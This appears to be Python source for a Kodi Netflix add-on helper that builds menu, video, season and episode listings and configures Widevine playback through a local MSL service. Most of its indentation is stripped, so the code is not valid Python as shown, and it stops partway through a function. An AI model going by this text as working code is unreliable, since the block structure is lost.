for profile in profiles:
# load & encode profile data
enc_profile_name = profile.get('profileName', '').encode('utf-8')
unescaped_profile_name = html_parser.unescape(enc_profile_name)
profile_guid = profile.get('guid')
# build urls
url = build_url({'action': action, 'profile_id': profile_guid})
autologin_url = build_url({
'action': 'save_autologin',
'autologin_id': profile_guid,
'autologin_user': enc_profile_name})
# add list item
list_item = xbmcgui.ListItem(
label=unescaped_profile_name,
iconImage=profile.get('avatar'))
list_item.setProperty(
key='fanart_image',
value=self.default_fanart)
# add context menu options
auto_login = (
self.get_local_string(30053),
'RunPlugin(' + autologin_url + ')')
list_item.addContextMenuItems(items=[auto_login])
# add directory & sorting options
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url,
listitem=list_item,
isFolder=True)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_FOLDER)
return xbmcplugin.endOfDirectory(handle=self.plugin_handle)
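    # Hedged example of the build_url callback this method expects (the base
    # url handling and the 'video_lists' action string are illustrative, not
    # taken from the original add-on):
    #
    #   def build_url(query):
    #       return base_url + '?' + urlencode(query)
    #
    #   helper.build_profiles_listing(profiles, 'video_lists', build_url)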
def build_main_menu_listing(self, video_list_ids, user_list_order, actions,
build_url, widget_display=False):
"""
Builds the video lists (my list, continue watching, etc.) Kodi screen
Parameters
----------
video_list_ids : :obj:`dict` of :obj:`str`
List of video lists
user_list_order : :obj:`list` of :obj:`str`
Ordered user lists
            to determine what should be displayed in the main menu
actions : :obj:`dict` of :obj:`str`
Dictionary of actions to build subsequent routes
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
            List could be built
"""
preselect_items = []
for category in user_list_order:
for video_list_id in video_list_ids['user']:
if video_list_ids['user'][video_list_id]['name'] == category:
label = video_list_ids['user'][video_list_id]['displayName']
if category == 'netflixOriginals':
label = label.capitalize()
li = xbmcgui.ListItem(label=label, iconImage=self.default_fanart)
li.setProperty('fanart_image', self.default_fanart)
# determine action route
action = actions['default']
if category in actions.keys():
action = actions[category]
# determine if the item should be selected
preselect_items.append((False, True)[category == self.get_main_menu_selection()])
url = build_url({'action': action, 'video_list_id': video_list_id, 'type': category})
xbmcplugin.addDirectoryItem(handle=self.plugin_handle, url=url, listitem=li, isFolder=True)
# add recommendations/genres as subfolders
# (save us some space on the home page)
i18n_ids = {
'recommendations': self.get_local_string(30001),
'genres': self.get_local_string(30010)
}
for type in i18n_ids.keys():
# determine if the lists have contents
if len(video_list_ids[type]) > 0:
# determine action route
action = actions['default']
if type in actions.keys():
action = actions[type]
# determine if the item should be selected
preselect_items.append((False, True)[type == self.get_main_menu_selection()])
li_rec = xbmcgui.ListItem(
label=i18n_ids[type],
iconImage=self.default_fanart)
li_rec.setProperty('fanart_image', self.default_fanart)
url_rec = build_url({'action': action, 'type': type})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url_rec,
listitem=li_rec,
isFolder=True)
# add search as subfolder
action = actions['default']
if 'search' in actions.keys():
            action = actions['search']
li_rec = xbmcgui.ListItem(
label=self.get_local_string(30011),
iconImage=self.default_fanart)
li_rec.setProperty('fanart_image', self.default_fanart)
url_rec = build_url({'action': action, 'type': 'search'})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url_rec,
listitem=li_rec,
isFolder=True)
# add exported as subfolder
action = actions['default']
if 'exported' in actions.keys():
            action = actions['exported']
li_rec = xbmcgui.ListItem(
label=self.get_local_string(30048),
iconImage=self.default_fanart)
li_rec.setProperty('fanart_image', self.default_fanart)
url_rec = build_url({'action': action, 'type': 'exported'})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url_rec,
listitem=li_rec,
isFolder=True)
if self.show_update_db == 'true':
# add updatedb as subfolder
li_rec = xbmcgui.ListItem(
label=self.get_local_string(30049),
iconImage=self.default_fanart)
li_rec.setProperty('fanart_image', self.default_fanart)
url_rec = build_url({'action': 'updatedb'})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url_rec,
listitem=li_rec,
isFolder=True)
# no sorting & close
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_UNSORTED)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_FOLDER)
xbmcplugin.endOfDirectory(self.plugin_handle)
# (re)select the previously selected main menu entry
idx = 1
for item in preselect_items:
idx += 1
preselected_list_item = idx if item else None
preselected_list_item = idx + 1 if self.get_main_menu_selection() == 'search' else preselected_list_item
if preselected_list_item is not None:
xbmc.executebuiltin('ActivateWindowAndFocus(%s, %s)' % (str(xbmcgui.Window(xbmcgui.getCurrentWindowId()).getFocusId()), str(preselected_list_item)))
if not widget_display:
self.set_custom_view(VIEW_FOLDER)
return True
def build_video_listing(self, video_list, actions, type, build_url,
has_more=False, start=0, current_video_list_id="",
widget_display=False):
"""
Builds the video lists (my list, continue watching, etc.)
contents Kodi screen
Parameters
----------
video_list_ids : :obj:`dict` of :obj:`str`
List of video lists
actions : :obj:`dict` of :obj:`str`
Dictionary of actions to build subsequent routes
type : :obj:`str`
            None or 'queue', e.g. when it's a special video list
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
            List could be built
"""
view = VIEW_FOLDER
content = CONTENT_FOLDER
listItems = list()
for video_list_id in video_list:
video = video_list[video_list_id]
li = xbmcgui.ListItem(
label=video['title'],
iconImage=self.default_fanart)
# add some art to the item
li.setArt(self._generate_art_info(entry=video))
# add list item info
infos = self._generate_listitem_info(entry=video, li=li)
self._generate_context_menu_items(entry=video, li=li)
            # lists can be mixed with shows & movies, therefore we need to check if it's a movie and play it right away
if video['type'] == 'movie':
                # it's a movie, so we need no subfolder & a route to play it
isFolder = False
maturity = video.get('maturity', {}).get('level', 999)
                needs_pin = (True, False)[int(maturity) >= 100]
url = build_url({
'action': 'play_video',
'video_id': video_list_id,
'infoLabels': infos,
'pin': needs_pin})
view = VIEW_MOVIE
content = CONTENT_MOVIE
else:
                # it's a show, so we need a subfolder & route (for seasons)
isFolder = True
params = {
'action': actions[video['type']],
'show_id': video_list_id
}
params['pin'] = (True, False)[int(video.get('maturity', {}).get('level', 1001)) >= 1000]
if 'tvshowtitle' in infos:
title = infos.get('tvshowtitle', '').encode('utf-8')
params['tvshowtitle'] = base64.urlsafe_b64encode(title)
url = build_url(params)
view = VIEW_SHOW
content = CONTENT_SHOW
listItems.append((url, li, isFolder))
if has_more:
li_more = xbmcgui.ListItem(label=self.get_local_string(30045))
more_url = build_url({
"action": "video_list",
"type": type,
"start": str(start),
"video_list_id": current_video_list_id})
listItems.append((more_url, li_more, True))
xbmcplugin.addDirectoryItems(self.plugin_handle, listItems, len(listItems))
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_UNSORTED)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_TITLE)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_VIDEO_YEAR)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_GENRE)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LASTPLAYED)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=content)
xbmcplugin.endOfDirectory(self.plugin_handle)
if not widget_display:
self.set_custom_view(view)
return True
def build_video_listing_exported(self, content, build_url, widget_display=False):
"""Build list of exported movies / shows
Parameters
----------
content : :obj:`dict` of :obj:`str`
List of video lists
Returns
-------
bool
            List could be built
"""
action = ['remove_from_library', self.get_local_string(30030), 'remove']
li = xbmcgui.ListItem(
label=self.get_local_string(30064),
iconImage=self.default_fanart)
li.setProperty('fanart_image', self.default_fanart)
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=build_url({'action': 'export-new-episodes','inbackground': True}),
listitem=li,
isFolder=False)
listing = content
for video in listing[0]:
year = self.library.get_exported_movie_year(title=video)
li = xbmcgui.ListItem(
label=str(video)+' ('+str(year)+')',
iconImage=self.default_fanart)
li.setProperty('fanart_image', self.default_fanart)
isFolder = False
url = build_url({
'action': 'removeexported',
'title': str(video),
'year': str(year),
'type': 'movie'})
art = {}
image = self.library.get_previewimage(video)
art.update({
'landscape': image,
'thumb': image
})
li.setArt(art)
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url,
listitem=li,
isFolder=isFolder)
for video in listing[2]:
li = xbmcgui.ListItem(
label=str(video),
iconImage=self.default_fanart)
li.setProperty('fanart_image', self.default_fanart)
isFolder = False
year = '0000'
url = build_url({
'action': 'removeexported',
                'title': str(video),
'year': str(year),
'type': 'show'})
art = {}
image = self.library.get_previewimage(video)
art.update({
'landscape': image,
'thumb': image
})
li.setArt(art)
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url,
listitem=li,
isFolder=isFolder)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_UNSORTED)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_TITLE)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_FOLDER)
xbmcplugin.endOfDirectory(self.plugin_handle)
if not widget_display:
self.set_custom_view(VIEW_EXPORTED)
return True
def build_search_result_folder(self, build_url, term, widget_display=False):
"""Add search result folder
Parameters
----------
build_url : :obj:`fn`
Function to build the subsequent routes
term : :obj:`str`
Search term
Returns
-------
:obj:`str`
Search result folder URL
"""
# add search result as subfolder
li_rec = xbmcgui.ListItem(
label='({})'.format(term),
iconImage=self.default_fanart)
li_rec.setProperty('fanart_image', self.default_fanart)
url_rec = build_url({'action': 'search_result', 'term': term})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url_rec,
listitem=li_rec,
isFolder=True)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_UNSORTED)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_FOLDER)
xbmcplugin.endOfDirectory(self.plugin_handle)
if not widget_display:
self.set_custom_view(VIEW_FOLDER)
return url_rec
def set_location(self, url, replace=False):
"""Set URL location
Parameters
----------
url : :obj:`str`
Window URL
ret : bool
Return to location prior to activation
Returns
-------
bool
Window was activated
"""
cmd = 'Container.Update({},{})'.format(url, str(replace))
return xbmc.executebuiltin(cmd)
def build_search_result_listing(self, video_list, actions, build_url):
"""Builds the search results list Kodi screen
Parameters
----------
video_list : :obj:`dict` of :obj:`str`
List of videos or shows
actions : :obj:`dict` of :obj:`str`
Dictionary of actions to build subsequent routes
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
            List could be built
"""
video_listing = self.build_video_listing(
video_list=video_list,
actions=actions,
type='search',
build_url=build_url)
return video_listing
def build_no_seasons_available(self):
"""Builds the season list screen if no seasons could be found
Returns
-------
bool
            List could be built
"""
self.dialogs.show_no_seasons_notify()
xbmcplugin.endOfDirectory(self.plugin_handle)
return True
def build_no_search_results_available(self, build_url, action):
"""Builds the search results screen if no matches could be found
Parameters
----------
action : :obj:`str`
            Action parameter to build the subsequent routes
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
            List could be built
"""
self.dialogs.show_no_search_results_notify()
return xbmcplugin.endOfDirectory(self.plugin_handle)
def build_user_sub_listing(self, video_list_ids, type, action, build_url,
widget_display=False):
"""
Builds the video lists screen for user subfolders
(genres & recommendations)
Parameters
----------
video_list_ids : :obj:`dict` of :obj:`str`
List of video lists
type : :obj:`str`
List type (genre or recommendation)
action : :obj:`str`
            Action parameter to build the subsequent routes
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
            List could be built
"""
for video_list_id in video_list_ids:
li = xbmcgui.ListItem(
label=video_list_ids[video_list_id]['displayName'],
iconImage=self.default_fanart)
li.setProperty('fanart_image', self.default_fanart)
url = build_url({'action': action, 'video_list_id': video_list_id})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_FOLDER)
xbmcplugin.endOfDirectory(self.plugin_handle)
if not widget_display:
self.set_custom_view(VIEW_FOLDER)
return True
def build_season_listing(self, seasons_sorted, build_url, widget_display=False):
"""Builds the season list screen for a show
Parameters
----------
seasons_sorted : :obj:`list` of :obj:`dict` of :obj:`str`
Sorted list of season entries
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
            List could be built
"""
for season in seasons_sorted:
li = xbmcgui.ListItem(label=season['text'])
# add some art to the item
li.setArt(self._generate_art_info(entry=season))
# add list item info
infos = self._generate_listitem_info(
entry=season,
li=li,
base_info={'mediatype': 'season'})
self._generate_context_menu_items(entry=season, li=li)
params = {'action': 'episode_list', 'season_id': season['id']}
if 'tvshowtitle' in infos:
title = infos.get('tvshowtitle', '').encode('utf-8')
params['tvshowtitle'] = base64.urlsafe_b64encode(title)
url = build_url(params)
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_NONE)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_VIDEO_YEAR)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LASTPLAYED)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_TITLE)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_SEASON)
xbmcplugin.endOfDirectory(self.plugin_handle)
if not widget_display:
self.set_custom_view(VIEW_SEASON)
return True
def build_episode_listing(self, episodes_sorted, build_url, widget_display=False):
"""Builds the episode list screen for a season of a show
Parameters
----------
episodes_sorted : :obj:`list` of :obj:`dict` of :obj:`str`
Sorted list of episode entries
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
            List could be built
"""
for episode in episodes_sorted:
li = xbmcgui.ListItem(label=episode['title'])
# add some art to the item
li.setArt(self._generate_art_info(entry=episode))
# add list item info
infos = self._generate_listitem_info(
entry=episode,
li=li,
base_info={'mediatype': 'episode'})
self._generate_context_menu_items(entry=episode, li=li)
maturity = episode.get('maturity', {}).get('maturityLevel', 999)
needs_pin = (True, False)[int(maturity) >= 100]
url = build_url({
'action': 'play_video',
'video_id': episode['id'],
'start_offset': episode['bookmark'],
'infoLabels': infos,
'pin': needs_pin})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url,
listitem=li,
isFolder=False)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_EPISODE)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_NONE)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_VIDEO_YEAR)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LASTPLAYED)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_TITLE)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_DURATION)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_EPISODE)
xbmcplugin.endOfDirectory(self.plugin_handle)
if not widget_display:
self.set_custom_view(VIEW_EPISODE)
return True
def play_item(self, video_id, start_offset=-1, infoLabels={}, tvshow_video_id=None, timeline_markers={}):
"""Plays a video
Parameters
----------
video_id : :obj:`str`
ID of the video that should be played
start_offset : :obj:`str`
Offset to resume playback from (in seconds)
infoLabels : :obj:`str`
the listitem's infoLabels
Returns
-------
bool
            List could be built
"""
is_helper = inputstreamhelper.Helper('mpd', drm='widevine')
if not is_helper.check_inputstream():
return False
# track play event
self.track_event('playVideo')
# inputstream addon properties
port = str(self.nx_common.get_setting('msl_service_port'))
msl_service_url = 'http://localhost:' + port
msl_manifest_url = msl_service_url + '/manifest?id=' + video_id
msl_manifest_url += '&dolby=' + self.nx_common.get_setting('enable_dolby_sound')
msl_manifest_url += '&hevc=' + self.nx_common.get_setting('enable_hevc_profiles')
msl_manifest_url += '&hdr=' + self.nx_common.get_setting('enable_hdr_profiles')
msl_manifest_url += '&dolbyvision=' + self.nx_common.get_setting('enable_dolbyvision_profiles')
msl_manifest_url += '&vp9=' + self.nx_common.get_setting('enable_vp9_profiles')
play_item = xbmcgui.ListItem(path=msl_manifest_url)
play_item.setContentLookup(False)
play_item.setMimeType('application/dash+xml')
play_item.setProperty(
key=is_helper.inputstream_addon + '.stream_headers',
value='user-agent=' + get_user_agent())
play_item.setProperty(
key=is_helper.inputstream_addon + '.license_type',
value='com.widevine.alpha')
play_item.setProperty(
key=is_helper.inputstream_addon + '.manifest_type',
value='mpd')
play_item.setProperty(
key=is_helper.inputstream_addon + '.license_key',
value=msl_service_url + '/license?id=' + video_id + '||b{SSM}!b{SID}|')
play_item.setProperty(
key=is_helper.inputstream_addon + '.server_certificate',
value='Cr0CCAMSEOVEukALwQ8307Y2+LVP+0MYh/HPkwUijgIwggEKAoIBAQDm875btoWUbGqQD8eAGuBlGY+Pxo8YF1LQR+Ex0pDONMet8EHslcZRBKNQ/09RZFTP0vrYimyYiBmk9GG+S0wB3CRITgweNE15cD33MQYyS3zpBd4z+sCJam2+jj1ZA4uijE2dxGC+gRBRnw9WoPyw7D8RuhGSJ95OEtzg3Ho+mEsxuE5xg9LM4+Zuro/9msz2bFgJUjQUVHo5j+k4qLWu4ObugFmc9DLIAohL58UR5k0XnvizulOHbMMxdzna9lwTw/4SALadEV/CZXBmswUtBgATDKNqjXwokohncpdsWSauH6vfS6FXwizQoZJ9TdjSGC60rUB2t+aYDm74cIuxAgMBAAE6EHRlc3QubmV0ZmxpeC5jb20SgAOE0y8yWw2Win6M2/bw7+aqVuQPwzS/YG5ySYvwCGQd0Dltr3hpik98WijUODUr6PxMn1ZYXOLo3eED6xYGM7Riza8XskRdCfF8xjj7L7/THPbixyn4mULsttSmWFhexzXnSeKqQHuoKmerqu0nu39iW3pcxDV/K7E6aaSr5ID0SCi7KRcL9BCUCz1g9c43sNj46BhMCWJSm0mx1XFDcoKZWhpj5FAgU4Q4e6f+S8eX39nf6D6SJRb4ap7Znzn7preIvmS93xWjm75I6UBVQGo6pn4qWNCgLYlGGCQCUm5tg566j+/g5jvYZkTJvbiZFwtjMW5njbSRwB3W4CrKoyxw4qsJNSaZRTKAvSjTKdqVDXV/U5HK7SaBA6iJ981/aforXbd2vZlRXO/2S+Maa2mHULzsD+S5l4/YGpSt7PnkCe25F+nAovtl/ogZgjMeEdFyd/9YMYjOS4krYmwp3yJ7m9ZzYCQ6I8RQN4x/yLlHG5RH/+WNLNUs6JAZ0fFdCmw=')
play_item.setProperty(
key='inputstreamaddon',
value=is_helper.inputstream_addon)
# check if we have a bookmark e.g. start offset position
if int(start_offset) > 0:
play_item.setProperty('StartOffset', str(start_offset) + '.0')
# set infoLabels
if len(infoLabels) > 0:
play_item.setInfo('video', infoLabels)
if len(infoLabels) == 0:
infoLabels = self.library.read_metadata_file(video_id=video_id)
art = self.library.read_artdata_file(video_id=video_id)
play_item.setArt(art)
play_item.setInfo('video', infoLabels)
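# data sent along with the PLAYBACK_INITIATED addon signal below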
signal_data = {'timeline_markers': timeline_markers}
if tvshow_video_id is not None:
signal_data.update({'tvshow_video_id': tvshow_video_id})
# check for content in kodi db
if str(infoLabels) != 'None':
if infoLabels['mediatype'] == 'episode':
id = self.showtitle_to_id(title=infoLabels['tvshowtitle'])
details = self.get_show_content_by_id(
showid=id,
showseason=infoLabels['season'],
showepisode=infoLabels['episode'])
else:
id = self.movietitle_to_id(title=infoLabels['title'])
details = self.get_movie_content_by_id(movieid=id)
if details is not False:
if 'resume' in details[0]:
resume_point = details[0].pop('resume')
play_item.setProperty(
'StartOffset', str(resume_point))
play_item.setInfo('video', details[0])
play_item.setArt(details[1])
signal_data.update({
'dbinfo': {
'dbid': details[0]['dbid'],
'dbtype': details[0]['mediatype'],
'playcount': details[0]['playcount']}})
if infoLabels['mediatype'] == 'episode':
signal_data['dbinfo'].update({'tvshowid': id[0]})
AddonSignals.sendSignal(Signals.PLAYBACK_INITIATED, signal_data)
return xbmcplugin.setResolvedUrl(
handle=self.plugin_handle,
succeeded=True,
listitem=play_item)
def _generate_art_info(self, entry):
"""Adds the art info from an entry to a Kodi list item
Parameters
----------
entry : :obj:`dict` of :obj:`str`
Entry that art dict should be generated for
Returns
-------
:obj:`dict` of :obj:`str`
Dictionary containing art info
"""
art = {'fanart': self.default_fanart}
# Cleanup art
art.update({
'landscape': '',
'thumb': '',
'fanart': '',
'poster': '',
'clearlogo': ''
})
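# 'boxarts' can be a single URL string or a dict with 'big'/'small'/'poster' keys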
if 'boxarts' in dict(entry).keys() and not isinstance(entry.get('boxarts'), dict):
big = entry.get('boxarts', '')
small = big
poster = big
if 'boxarts' in dict(entry).keys() and isinstance(entry.get('boxarts'), dict):
big = entry.get('boxarts', {}).get('big')
small = entry.get('boxarts', {}).get('small')
poster = entry.get('boxarts', {}).get('poster')
art.update({
'poster': poster,
'landscape': big or small,
'thumb': big or small,
'fanart': big or small
})
# Download image for exported listing
if 'title' in entry:
self.library.download_image_file(
title=entry['title'].encode('utf-8'),
url=str(big))
if 'interesting_moment' in dict(entry).keys():
if entry.get('type') == 'episode':
art.update({'thumb': entry['interesting_moment'],
'landscape': entry['interesting_moment']})
art.update({
'fanart': entry['interesting_moment']
})
if 'artwork' in dict(entry).keys():
art.update({
'fanart': entry['artwork']
})
if 'clearlogo' in dict(entry).keys():
art.update({'clearlogo': entry['clearlogo']})
if 'thumb' in dict(entry).keys():
art.update({'thumb': entry['thumb']})
if 'fanart' in dict(entry).keys():
art.update({'fanart': entry['fanart']})
if 'poster' in dict(entry).keys():
art.update({'poster': entry['poster']})
vid_id = entry.get('id', entry.get('summary', {}).get('id'))
self.library.write_artdata_file(video_id=str(vid_id), content=art)
return art
def _generate_listitem_info(self, entry, li, base_info={}):
infos, li_infos = self._generate_entry_info(entry, base_info)
li.setInfo('video', infos)
if li_infos.get('is_playable'):
li.setProperty('IsPlayable', 'true')
if 'quality' in li_infos:
li.addStreamInfo('video', li_infos['quality'])
return infos
def _generate_entry_info(self, entry, base_info):
"""Adds the item info from an entry to a Kodi list item
Parameters
----------
entry : :obj:`dict` of :obj:`str`
Entry that info dict should be generated for
base_info : :obj:`dict` of :obj:`str`
Additional info that overrules the entry info
Returns
-------
:obj:`dict` of :obj:`str`
Dictionary containing info labels
"""
infos = base_info
li_infos = {}
entry_keys = entry.keys()
# Cleanup item info
infos.update({
'writer': '',
'director': '',
'genre': '',
'mpaa': '',
'rating': '',
'plot': '',
'duration': '',
'season': '',
'title': '',
'tvshowtitle': '',
'mediatype': 'movie',
'playcount': '',
'episode': '',
'year': ''
})
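# fill the info labels from whatever keys the entry actually provides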
if 'cast' in entry_keys and len(entry['cast']) > 0:
infos.update({'cast': entry['cast']})
if 'creators' in entry_keys and len(entry['creators']) > 0:
infos.update({'writer': entry['creators'][0]})
if 'directors' in entry_keys and len(entry['directors']) > 0:
infos.update({'director': entry['directors'][0]})
if 'genres' in entry_keys and len(entry['genres']) > 0:
infos.update({'genre': entry['genres'][0]})
if 'maturity' in entry_keys:
if 'mpaa' in entry_keys:
infos.update({'mpaa': entry['mpaa']})
else:
if entry.get('maturity', None) is not None:
if entry.get('maturity', {}).get('board') is not None and entry.get('maturity', {}).get('value') is not None:
infos.update({'mpaa': str(entry['maturity']['board'].encode('utf-8')) + '-' + str(entry['maturity']['value'].encode('utf-8'))})
if 'rating' in entry_keys:
infos.update({'rating': int(entry['rating']) * 2})
if 'synopsis' in entry_keys:
infos.update({'plot': entry['synopsis']})
if 'plot' in entry_keys:
infos.update({'plot': entry['plot']})
if 'runtime' in entry_keys:
infos.update({'duration': entry['runtime']})
if 'duration' in entry_keys:
infos.update({'duration': entry['duration']})
if 'seasons_label' in entry_keys:
infos.update({'season': entry['seasons_label']})
if 'season' in entry_keys:
infos.update({'season': entry['season']})
if 'title' in entry_keys:
infos.update({'title': entry['title']})
if 'type' in entry_keys:
if entry['type'] == 'movie' or entry['type'] == 'episode':
li_infos['is_playable'] = True
elif entry['type'] == 'show':
infos.update({'tvshowtitle': entry['title']})
if 'mediatype' in entry_keys:
if (entry['mediatype'] == 'movie' or
entry['mediatype'] == 'episode'):
li_infos['is_playable'] = True
infos.update({'mediatype': entry['mediatype']})
if 'watched' in entry_keys and entry.get('watched') is True:
infos.update({'playcount': 1})
else:
del infos['playcount']
if 'index' in entry_keys:
infos.update({'episode': entry['index']})
if 'episode' in entry_keys:
infos.update({'episode': entry['episode']})
if 'year' in entry_keys:
infos.update({'year': entry['year']})
if 'quality' in entry_keys:
quality = {'width': '960', 'height': '540'}
if entry['quality'] == '720':
quality = {'width': '1280', 'height': '720'}
if entry['quality'] == '1080':
quality = {'width': '1920', 'height': '1080'}
li_infos['quality'] = quality
if 'tvshowtitle' in entry_keys:
title = entry.get('tvshowtitle', '')
if not isinstance(title, unicode):
title = base64.urlsafe_b64decode(title).decode('utf-8')
infos.update({'tvshowtitle': title})
self.library.write_metadata_file(
video_id=str(entry['id']), content=infos)
return infos, li_infos
def _generate_context_menu_items(self, entry, li):
"""Adds context menue items to a Kodi list item
Parameters
----------
entry : :obj:`dict` of :obj:`str`
Entry that should be turned into a list item
li : :obj:`XMBC.ListItem`
Kodi list item instance
Returns
-------
:obj:`XMBC.ListItem`
Kodi list item instance
"""
items = []
action = {}
entry_keys = entry.keys()
# action item templates
encoded_title = urlencode({'title': entry['title'].encode('utf-8')}) if 'title' in entry else ''
url_tmpl = 'XBMC.RunPlugin(' + self.base_url + '?action=%action%&id=' + str(entry['id']) + '&' + encoded_title + ')'
if not self._context_menu_actions:
self._context_menu_actions = [
['export_to_library', self.get_local_string(30018), 'export'],
['remove_from_library', self.get_local_string(30030), 'remove'],
['update_the_library', self.get_local_string(30061), 'update'],
['rate_on_netflix', self.get_local_string(30019), 'rating'],
['remove_from_my_list', self.get_local_string(30020), 'remove_from_list'],
['add_to_my_list', self.get_local_string(30021), 'add_to_list']
]
# build concrete action items
for action_item in self._context_menu_actions:
action.update({action_item[0]: [action_item[1], url_tmpl.replace('%action%', action_item[2])]})
# add or remove the movie/show/season/episode from & to the users "My List"
if 'in_my_list' in entry_keys:
items.append(action['remove_from_my_list']) if entry['in_my_list'] else items.append(action['add_to_my_list'])
elif 'queue' in entry_keys:
items.append(action['remove_from_my_list']) if entry['queue'] else items.append(action['add_to_my_list'])
elif 'my_list' in entry_keys:
items.append(action['remove_from_my_list']) if entry['my_list'] else items.append(action['add_to_my_list'])
# rate the movie/show/season/episode on Netflix
items.append(action['rate_on_netflix'])
# add possibility to export this movie/show/season/episode to a static/local library (and to remove it)
if 'type' in entry_keys:
# add/remove movie
if entry['type'] == 'movie':
action_type = 'remove_from_library' if self.library.movie_exists(title=entry['title'], year=entry.get('year', 0000)) else 'export_to_library'
items.append(action[action_type])
# Add update option
if action_type == 'remove_from_library':
action_type = 'update_the_library'
items.append(action[action_type])
if entry['type'] == 'show' and 'title' in entry_keys:
action_type = 'remove_from_library' if self.library.show_exists(title=entry['title']) else 'export_to_library'
items.append(action[action_type])
# Add update option
if action_type == 'remove_from_library':
action_type = 'update_the_library'
items.append(action[action_type])
# add it to the item
li.addContextMenuItems(items)
#return li
def movietitle_to_id(self, title):
query = {
"jsonrpc": "2.0",
"method": "VideoLibrary.GetMovies",
"params": {
"properties": ["title"]
},
"id": "libMovies"
}
try:
rpc_result = xbmc.executeJSONRPC(
jsonrpccommand=json.dumps(query, encoding='utf-8'))
json_result = json.loads(rpc_result)
if 'result' in json_result and 'movies' in json_result['result']:
json_result = json_result['result']['movies']
for movie in json_result:
# Switch to ascii/lowercase and remove special chars and spaces
# to make sure best possible compare is possible
titledb = movie['title'].encode('ascii', 'ignore')
titledb = re.sub(r'[?|$|!|:|#|\.|\,|\'| ]', r'', titledb).lower().replace('-', '')
if '(' in titledb:
titledb = titledb.split('(')[0]
titlegiven = title.encode('ascii', 'ignore')
titlegiven = re.sub(r'[?|$|!|:|#|\.|\,|\'| ]', r'', titlegiven).lower().replace('-', '')
if '(' in titlegiven:
titlegiven = titlegiven.split('(')[0]
if titledb == titlegiven:
return movie['movieid']
return '-1'
except Exception:
return '-1'
def showtitle_to_id(self, title):
query = {
"jsonrpc": "2.0",
"method": "VideoLibrary.GetTVShows",
"params": {
"properties": ["title", "genre"]
},
"id": "libTvShows"
}
try:
rpc_result = xbmc.executeJSONRPC(
jsonrpccommand=json.dumps(query, encoding='utf-8'))
json_result = json.loads(rpc_result)
if 'result' in json_result and 'tvshows' in json_result['result']:
json_result = json_result['result']['tvshows']
for tvshow in json_result:
# Switch to ascii/lowercase and
# remove special chars and spaces
# to make sure best possible compare is possible
